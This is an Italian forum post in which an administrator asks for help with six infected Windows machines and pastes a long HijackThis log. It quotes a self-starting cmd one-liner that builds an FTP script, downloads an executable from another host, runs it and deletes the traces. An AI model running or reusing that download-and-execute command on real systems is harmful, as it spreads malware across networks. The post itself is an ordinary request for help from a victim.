Ciao a tutti.
Ho 6 pc che continuano a far partire finestre di dos in contemporanea.
Poi appaioni due file e un servizio strano.
Non riesco a capire chi è che innesca questo processo malefico che mi imballa 4 client e due server :-(
Il comando che parte in automatico è questo:
cmd /c echo OPEN 172.20.11.36 6561>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
I file che si creano sono:
84785_2pac.exe spesso viene creato in una directory del server.
C:\WINDOWS\system32\dllcache\Updtftpini.exe questo invece si viene a creare in locale.
E in più si crea un servizio che si chiama così:
Microsoft windows FTPd
Ecco il log di HijackThis, se riesco vi posto anche quello di un client magari.
Logfile of HijackThis v1.99.1
Scan saved at 10.33.45, on 08/05/2007
Platform: Windows 2003 SP1 (WinNT 5.02.3790)
MSIE: Internet Explorer v7.00 (7.00.6000.16414)
Running processes:
C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmi\IBM\ServeRAID Manager\aqagent.exe
C:\Programmi\IBM\Director\bin\asf\ASFAgent.exe
C:\Programmi\IBM\Director\bin\ibmasfsrv.exe
C:\Programmi\IBM\Director\cimom\bin\BAsfIpM.exe
C:\Programmi\IBM\Director\cimom\bin\cimlistener.exe
C:\WINDOWS\system32\cisvc.exe
C:\WINDOWS\CWBRXD.EXE
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\IBMSA.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\Programmi\IBM\Director\bin\slp_srvreg.exe
C:\Programmi\Network Associates\Common Framework\FrameworkService.exe
C:\Programmi\Network Associates\VirusScan\Mcshield.exe
C:\Programmi\Network Associates\VirusScan\VsTskMgr.exe
C:\Programmi\IBM\ServeRAID Manager\miniwinagent.exe
f:\Archidoc\Engine\BIN\RDS.EXE
C:\Programmi\IBM\ServeRAID Manager\RaidServ.exe
C:\Programmi\Siav\e-Dispatcher\edispatcher.exe
C:\Programmi\IBM\Director\cimom\bin\tier1slp.exe
C:\Programmi\IBM\Director\bin\twgipcsv.exe
C:\Programmi\IBM\Director\bin\twgipc.exe
C:\VEXPLITE\viritsvc.exe
C:\Programmi\RealVNC\VNC4\WinVNC4.exe
C:\Programmi\IBM\Director\cimom\bin\wmicimserver.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\twgengsv.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\twgsrvw.exe
C:\WINDOWS\Explorer.EXE
C:\Programmi\IBM\Director\bin\TWGLogEngine.exe
C:\Programmi\Network Associates\VirusScan\SHSTAT.EXE
C:\Programmi\Network Associates\Common Framework\UpdaterUI.exe
C:\Programmi\File comuni\Network Associates\TalkBack\TBMon.exe
C:\VEXPLITE\MONLITE.EXE
C:\Programmi\IBM\Director\bin\twgescli.exe
C:\Programmi\IBM\Director\bin\twgmonit.exe
C:\Programmi\File comuni\Ahead\lib\NMBgMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programmi\IBM\Director\bin\twgsrvst.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\twgsrvxw.exe
C:\Programmi\Prevx1\PXConsole.exe
C:\Programmi\Prevx1\PXAgent.exe
C:\WINDOWS\system32\cidaemon.exe
C:\WINDOWS\system32\cidaemon.exe
C:\Programmi\Internet Explorer\iexplore.exe
C:\hijackthis\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = res://shdoclc.dll/hardAdmin.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = res://shdoclc.dll/hardAdmin.htm
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = C:\WINDOWS\system32\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmi\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Malicious Scripts Scanner - {55EA1964-F5E4-4D6A-B9B2-125B37655FCB} - C:\Documents and Settings\All Users\Dati applicazioni\Prevx\pxbho.dll
O4 - HKLM\..\Run: [Tweak UI] RUNDLL32.EXE TWEAKUI.CPL,TweakMeUp
O4 - HKLM\..\Run: [ShStatEXE] "C:\Programmi\Network Associates\VirusScan\SHSTAT.EXE" /STANDALONE
O4 - HKLM\..\Run: [McAfeeUpdaterUI] "C:\Programmi\Network Associates\Common Framework\UpdaterUI.exe" /StartedFromRunKey
O4 - HKLM\..\Run: [Network Associates Error Reporting Service] "C:\Programmi\File comuni\Network Associates\TalkBack\TBMon.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Programmi\File comuni\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [Client Access Service] "C:\Programmi\IBM\Client Access\cwbsvstr.exe"
O4 - HKLM\..\Run: [Client Access Help Update] "C:\Programmi\IBM\Client Access\cwbinhlp.exe"
O4 - HKLM\..\Run: [Client Access Check Version] "C:\Programmi\IBM\Client Access\cwbckver.exe" LOGIN
O4 - HKLM\..\Run: [Client Access Express Welcome] "C:\Programmi\IBM\Client Access\cwbwlwiz.exe"
O4 - HKLM\..\Run: [VIRIT LITE MONITOR] C:\VEXPLITE\MONLITE.EXE
O4 - HKLM\..\Run: [PrevxOne] "C:\Programmi\Prevx1\PXConsole.exe"
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Programmi\File comuni\Ahead\lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [updateMgr] C:\Programmi\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe AcRdB7_0_5 -reboot 1
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\RunOnce: [FlashPlayerUpdate] C:\WINDOWS\system32\Macromed\Flash\GetFlash.exe
O4 - Global Startup: Avvio veloce di Adobe Reader.lnk = C:\Programmi\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Server status.lnk = C:\Programmi\IBM\Director\bin\twgsrvst.exe
O10 - Broken Internet access because of LSP provider 'c:\documents and settings\administrator.gio2000\windows\system32\mswsock.dll' missing
O11 - Options group: [INTERNATIONAL] International*
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\Software\..\Telephony: DomainName = gio2000.loc
O17 - HKLM\System\CCS\Services\Tcpip\..\{DE0EA623-0478-4907-BD81-C2F196971765}: NameServer = 172.20.10.19,172.20.10.3
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = gio2000.loc
O20 - Winlogon Notify: dimsntfy - dimsntfy.dll (file missing)
O20 - Winlogon Notify: WgaLogon - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\
O23 - Service: Servizio di verifica compatibilità applicazioni (AeLookupSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Avvisi (Alerter) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio Gateway di livello applicazione (ALG) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Gestione applicazione (AppMgmt) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Application Quiesce Agent (aqagent) - Adaptec - C:\Programmi\IBM\ServeRAID Manager\aqagent.exe
O23 - Service: ASF Agent (ASFAgent) - Intel Corporation - C:\Programmi\IBM\Director\bin\asf\ASFAgent.exe
O23 - Service: AsfSrv - IBM Corporation - C:\Programmi\IBM\Director\bin\ibmasfsrv.exe
O23 - Service: Servizio stato di ASP.NET (aspnet_state) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe (file missing)
O23 - Service: Audio Windows (AudioSrv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Broadcom ASF IP monitoring service v3.0.1 (BAsfIpM) - Broadcom Corp. - C:\Programmi\IBM\Director\cimom\bin\BAsfIpM.exe
O23 - Service: Servizio trasferimento intelligente in background (BITS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Browser di computer (Browser) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: IBM Director CIM Listener (cimlistener) - OpenSource Pegasus - C:\Programmi\IBM\Director\cimom\bin\cimlistener.exe
O23 - Service: Servizio di indicizzazione (CiSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\cisvc.exe (file missing)
O23 - Service: Servizi di crittografia (CryptSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Comando remoto iSeries Access per Windows (Cwbrxd) - IBM Corporation - C:\WINDOWS\CWBRXD.EXE
O23 - Service: Utilità di avvio processi server DCOM (DcomLaunch) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: File system distribuito (Dfs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\Dfssvc.exe (file missing)
O23 - Service: Client DHCP (Dhcp) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio amministrativo di Gestione disco logico (dmadmin) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\dmadmin.exe (file missing)
O23 - Service: Gestione dischi logici (dmserver) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Client DNS (Dnscache) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio di segnalazione errori (ERSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Registro eventi (Eventlog) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\services.exe (file missing)
O23 - Service: Guida in linea e supporto tecnico (helpsvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: HID Input Service (HidServ) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: IBM SLP SA (ibmsa) - IBM Corporation - C:\Programmi\IBM\Director\bin\IBMSA.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmi\File comuni\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: Server (lanmanserver) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Workstation (lanmanworkstation) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Helper NetBIOS di TCP/IP (LmHosts) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio di framework di McAfee (McAfeeFramework) - Network Associates, Inc. - C:\Programmi\Network Associates\Common Framework\FrameworkService.exe
O23 - Service: Network Associates McShield (McShield) - Network Associates, Inc. - C:\Programmi\Network Associates\VirusScan\Mcshield.exe
O23 - Service: Network Associates Task Manager (McTaskManager) - Network Associates, Inc. - C:\Programmi\Network Associates\VirusScan\VsTskMgr.exe
O23 - Service: ServeRAID FlashCopy Agent (miniwinagent) - Unknown owner - C:\Programmi\IBM\ServeRAID Manager\miniwinagent.exe
O23 - Service: Servizio Pubblicazione FTP (MSFtpsvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\inetsrv\inetinfo.exe (file missing)
O23 - Service: Accesso rete (Netlogon) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Connessioni di rete (Netman) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: NLA (Network Location Awareness) (Nla) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Replica file (NtFrs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\ntfrs.exe (file missing)
O23 - Service: Provider supporto protezione LM NT (NtLmSsp) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Archivi rimovibili (NtmsSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Plug and Play (PlugPlay) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\services.exe (file missing)
O23 - Service: Servizi IPSEC (PolicyAgent) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Prevx Agent (PREVXAgent) - Unknown owner - C:\Programmi\Prevx1\PXAgent.exe" -f (file missing)
O23 - Service: Archiviazione protetta (ProtectedStorage) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Auto Connection Manager di Accesso remoto (RasAuto) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Connection Manager di Accesso remoto (RasMan) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: RDM Server (RDS) - Unknown owner - f:\Archidoc\Engine\BIN\RDS.EXE" RDS (file missing)
O23 - Service: Registro di sistema remoto (RemoteRegistry) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: RPC Locator (RpcLocator) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\locator.exe (file missing)
O23 - Service: RPC (Remote Procedure Call) (RpcSs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Provider Gruppo di criteri risultante (RSoPProv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\RSoPProv.exe (file missing)
O23 - Service: Helper console di amministrazione speciale (sacsvr) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Gestione account di protezione (SAM) (SamSs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Smart card (SCardSvr) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\SCardSvr.exe (file missing)
O23 - Service: Utilità di pianificazione (Schedule) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Accesso secondario (seclogon) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Notifica eventi di sistema (SENS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: ServeRAID Manager Agent (ServeRAIDManagerAgent) - Adaptec Incorporated - C:\Programmi\IBM\ServeRAID Manager\RaidServ.exe
O23 - Service: Windows Firewall / Condivisione connessione Internet (ICS) (SharedAccess) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Rilevamento hardware shell (ShellHWDetection) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Siav e-Dispatcher - Siav - Soluzioni Informatiche e di Automazione - C:\Programmi\Siav\e-Dispatcher\edispatcher.exe
O23 - Service: Siav Mailbox - Siav - Soluzioni Informatiche e di Automazione - C:\Programmi\Siav\e-Dispatcher\SvMailbox.exe
O23 - Service: Spooler di stampa (Spooler) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\spoolsv.exe (file missing)
O23 - Service: Microsoft Software Shadow Copy Provider (swprv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Avvisi e registri di prestazioni (SysmonLog) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\smlogsvc.exe (file missing)
O23 - Service: Telefonia (TapiSrv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizi terminal (TermService) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: IBM Director Agent SLP Attributes (tier1slp) - IBM Corporation - C:\Programmi\IBM\Director\cimom\bin\tier1slp.exe
O23 - Service: Manutenzione collegamenti distribuiti client (TrkWks) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: IBM Director Support Program (TWGIPC) - IBM Corporation - C:\Programmi\IBM\Director\bin\twgipcsv.exe
O23 - Service: IBM Director Server (TWGSERVER) - IBM Corporation - C:\Programmi\IBM\Director\bin\twgengsv.exe
O23 - Service: Gruppo di continuità (UPS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\ups.exe (file missing)
O23 - Service: Servizio dischi virtuali (vds) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\vds.exe (file missing)
O23 - Service: Virit eXplorer Lite (viritsvclite) - TG Soft Sas http://www.tgsoft.it - C:\VEXPLITE\viritsvc.exe
O23 - Service: Copia shadow del volume (VSS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\vssvc.exe (file missing)
O23 - Service: Ora di Windows (W32Time) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizio Pubblicazione sul Web (W3SVC) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizio rilevamento automatico proxy WinHTTP (WinHttpAutoProxySvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Strumentazione gestione Windows (winmgmt) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programmi\RealVNC\VNC4\WinVNC4.exe" -service (file missing)
O23 - Service: Portable Media Serial Number Service (WmdmPmSN) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Estensioni driver di Strumentazione gestione Windows (Wmi) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: IBM Director Agent WMI CIM Server (wmicimserver) - IBM Corporation - C:\Programmi\IBM\Director\cimom\bin\wmicimserver.exe
O23 - Service: Aggiornamenti automatici (wuauserv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Configurazione senza fili (WZCSVC) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizio Provisioning di rete (xmlprov) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)